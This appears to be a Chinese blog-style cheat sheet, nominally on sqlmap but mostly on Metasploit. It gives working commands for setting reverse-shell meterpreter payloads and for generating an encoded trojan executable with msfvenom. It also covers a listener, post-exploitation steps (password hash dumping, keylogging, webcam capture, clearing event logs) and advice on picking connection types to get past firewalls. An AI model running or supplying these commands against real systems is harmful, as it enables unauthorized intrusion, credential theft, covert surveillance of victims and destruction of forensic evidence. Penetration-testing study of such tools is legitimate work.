当前位置: 首页 > news >正文

Sqlmap用法

一、测试

sqlmap -u  "网址"

二、msf用法

2.1.常用命令

基础命令:
msfconsole 启动Metasploit控制台 help 查看帮助 search
<关键词> 搜索模块(如search eternalblue) use <模块路径> 使用某个模块(如use exploit/windows/smb/ms17_010_eternalblue) show options 显示当前模块的配置选项 set <参数> <值> 设置参数(如set RHOSTS 192.168.1.1) setg <参数> <值> 全局设置参数(对所有模块生效) unset <参数> 取消参数设置 back 退出当前模块 exit/quit 退出msfconsole

查看模块:show exploits 显示所有漏洞利用模块

  show payloads 显示当前模块可用的Payload
  show auxiliary 显示所有辅助模块
  show encoders 显示编码器
  show nops 显示NOP生成器

漏洞利用:

# 设置Payload(例如反向Shell)
set payload windows/x64/meterpreter/reverse_tcp

# 设置监听IP(本机)
set LHOST 192.168.1.100
set LPORT 4444

# 执行漏洞利用
run
# 或
exploit

# 后台执行(保持会话)
exploit -j

会话管理

sessions 查看所有活跃会话
sessions -i <ID> 进入指定会话(如sessions -i 1)
background 将当前会话放到后台(快捷键:Ctrl+Z)
kill <ID> 结束指定会话
sessions -u <ID> 升级Shell为Meterpreter会话

Meterpreter常用命令

sysinfo 查看目标系统信息
getuid 查看当前用户权限
shell 切换到系统Shell
upload <本地文件> <远程路径> 上传文件
download <远程文件> <本地路径> 下载文件
ps 查看进程列表
migrate <PID> 迁移进程(提权/隐藏)
run post/windows/gather/hashdump 导出密码哈希
screenshot 截屏
keyscan_start 开始键盘记录
keyscan_dump 导出键盘记录
webcam_snap 摄像头拍照
clearev 清除日志

搜索:

search type:auxiliary name:smb # 搜索SMB相关辅助模块
search cve:2023-1234 # 搜索特定CVE编号
search platform:windows eternal # 搜索Windows平台的永恒之蓝相关

 

2.1模块路径:

exploit漏洞利用模块路径:/usr/share/metasploit-framework/modules/exploits

payload模块路径:/usr/share/metasploit-framework/modules/payloads,常见的payload有:

windows/meterpreter/bind_tcp       #正向连接
windows/meterpreter/reverse_tcp    #反向连接,常用
windows/meterpreter/reverse_http   #通过监听80端口反向连接
windows/meterpreter/reverse_https  #通过监听443端口反向连接
 
正向连接使用场景:我们的攻击机在内网环境,被攻击机是外网环境,由于被攻击机无法主动连接到我们的主机,所以就必须我们主动连接被攻击机了。但是这里经常遇到的问题是,被攻击机上开了防火墙,只允许访问指定的端口
反向连接使用场景:我们的主机和被攻击机都是在外网或者都是在内网,这样被攻击机就能主动连接到我们的主机了。如果是这样的情况,建议使用反向连接,因为反向连接的话,即使被攻击机开了防火墙也没事,防火墙只是阻止进入被攻击机的流量,而不会阻止被攻击机主动向外连接的流量。 
反向连接80和443端口使用场景:被攻击机能主动连接到我们的主机,还有就是被攻击机的防火墙设置的特别严格,就连被攻击机访问外部网络的流量也进行了严格的限制,只允许被攻击机的80端口或443端口与外部通信

2.3案例    

生成木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -e x86/shikata_ga_nai -i 5 -f exe -o payload.exe

设置远程监听 msfconsole use exploit
/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lport run    

后期迁移

# 在Meterpreter会话中运行:
run post/windows/manage/migrate # 自动进程迁移
run post/multi/gather/ping_sweep # 内网存活主机扫描


# 在msfconsole中使用:
use post/windows/gather/enum_shares
set SESSION 1
run

 
http://www.jsqmd.com/news/176827/

相关文章:

  • C语言WASM浏览器适配实战(从入门到精通的7个步骤)
  • Trainer重构案例:实现课程学习训练策略
  • C语言存算一体架构设计与能效优化实战(能耗降低90%的秘密)
  • 合肥抖音代运营哪家更靠谱?2025年终7家服务商权威对比与最终推荐! - 品牌推荐
  • 开始使用vnpy1
  • LmDeploy部署GPTQ模型:低延迟API服务搭建
  • 昆明抖音代运营哪家靠谱?2025年终7家实力机构权威评测与最终推荐! - 品牌推荐
  • ReFT受限微调变换:适用于特定参数子集的方法
  • QLoRA低显存训练秘籍:消费级显卡也能跑百亿参数模型
  • OpenMP 5.3并行编程实战精要(效率提升瓶颈全突破)
  • 2025年值得信赖的钣金加工公司榜单出炉,行业内钣金加工公司排行榜甄选实力品牌 - 品牌推荐师
  • DoRA权重分解训练:方向与幅值分离的创新尝试
  • 边缘计算+AI+低功耗:C语言开发者必须掌握的3大省电技术
  • EETQ企业加密量化:保护模型知识产权的新方案
  • 错过再等十年:C语言构建高性能实时识别系统的终极指南
  • 【量子模拟开发者必看】:C语言中高效实现Hadamard、CNOT等8类量子门的操作方法
  • 包头抖音代运营哪家靠谱?2025年终7家服务商权威评测与最终推荐! - 品牌推荐
  • Java实习生必修课:深入解析Python解析器工作原理——从源码到字节码的完整执行流程
  • 预训练数据清洗流程:去除重复与低质内容的方法
  • LoRA+原理剖析:叠加结构带来的表达能力增强
  • 华为CANN 8.0深度评测:CANN在边缘AI场景的落地实践 - 教程
  • C语言避障算法性能提升10倍的秘密:飞控工程师20年经验总结
  • 揭秘C语言编译WASM的兼容性陷阱:99%开发者忽略的3个关键问题
  • GaLore投影梯度:将高维梯度压缩至低秩空间
  • Java开发者高效转型Python开发:PyCharm深度实战指南——从零配置到专业级开发全流程解析
  • 100+评测集分类介绍:通用、专业、安全三大类
  • 安装包总是损坏?试试从可信AI镜像源下载大模型与依赖库
  • 揭秘Modbus协议底层实现:C语言在工业设备通信中的关键应用
  • 轻量微调方式全景图:LoRA系与非LoRA系方法对比
  • 【工业自动化通信架构设计】:基于C语言的协议封装与优化策略